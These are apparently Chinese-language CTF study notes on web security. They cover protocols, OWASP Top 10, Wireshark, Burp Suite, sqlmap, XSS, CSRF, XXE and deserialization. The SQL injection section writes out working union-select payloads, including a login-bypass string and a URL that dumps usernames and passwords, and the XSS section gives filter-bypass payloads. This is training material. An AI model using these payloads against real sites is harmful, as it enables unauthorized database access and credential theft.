Web:更多的偏向于漏洞扫描与注入(这里学习使用的工具也是漏洞扫描时所需工具)
一.信息查询
- HTML、CSS和JavaScript简介(了解网络基本框架)
2.常见协议解析(HTTP、TCP/IP、ARP等)
3.OWASP Top10:这个项目总结的是Web最常见、最可能的十大漏洞帮助我们进一步了解发现企业的漏洞,还有一般的防御措施,是入门了解Web的必经之路
4.wireshark:过滤协议、端口、主机名以及数据包内容
比赛通常是给出已经抓取过的pcap让我们进行分析,简单的时候可以通过捕获TCP\http即可找到关键信息(也有可能放在数据包中哦,可以简单搜索一下flag哦)
5.SQL注入:一般是用来攻破和建立数据库的一些指令,在这里是为了获取网站的的关键信息这里根据比赛主要讲两个点,一个是爆破,一个是绕过。学习是也是学习数字型、字符型、字符型三种注入的注入点,并以此攻破数据库:
(1)爆破语句:
万能密码:‘or 1=1;#
爆数据库:password=:1' union select 1,2,database()#
爆表名:password=1' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1#
爆出表名为:l0ve1ysq1
万能密码:‘or 1=1;#
爆数据库password=:1' union select 1,2,database()#
爆表名password=1' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1#
爆出表名为l0ve1ysq1
爆列名password=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'
爆数据:/check.php?username=1&password=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23
爆数据:/check.php?username=1&password=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23
- 绕过:这里的绕过讲的就是几种注入效果(一般来说都是考效果(相对做题来说a、b、d见过的多)):
a:布尔盲注;
b:延时注入;
c:报错注入;
d:联合注入;
e:堆注入。
6.渗透工具之Burpsurite:
(1)用burpsuite进行抓包(需要搭配火狐浏览器设置代理才可):抓取的是http的包,相当于截取搜索页面的信息,然后查看提示信息
(2)burpsuite伪造http头部:Referer:URL
伪ip:X-Forwarded-For:ip
7.渗透工具之Sqlmap:主要是Sql注入的工具(还能进行扫描)
(1)练习Sql注入
(2)WAF的绕过以及文件上传
二.代码审计:
- XSS(跨站脚本攻击):(绕过)(1)大小写绕过:<script>alert(“xss”);</script>
<ScRipt>ALeRt(“XSS”);</sCRipT>
(2)双写绕过
(3)编码绕过(unicode)
(4)注释绕过(//绕过)
(5)利用HTML属性绕过、长度限制绕过
2.CSRF(跨站请求伪造)的利用
3.XXE漏洞原理
4.序列化与反序列化(串行化):对字符串与函数的绕过